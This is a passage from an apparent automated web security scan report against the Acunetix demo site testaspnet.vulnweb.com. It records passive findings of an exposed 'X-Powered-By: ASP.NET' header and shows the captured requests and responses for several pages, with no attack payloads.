</li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/robots.txt
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 282 bytes.	GET http://testaspnet.vulnweb.com/robots.txt HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 245 bytes.	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:46:42 GMT Accept-Ranges: bytes ETag: "b0b05ac194d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 13
Response Body - size: 13 bytes.	User-agent: *
URL	http://testaspnet.vulnweb.com/rssFeed.aspx
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 220 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 2118
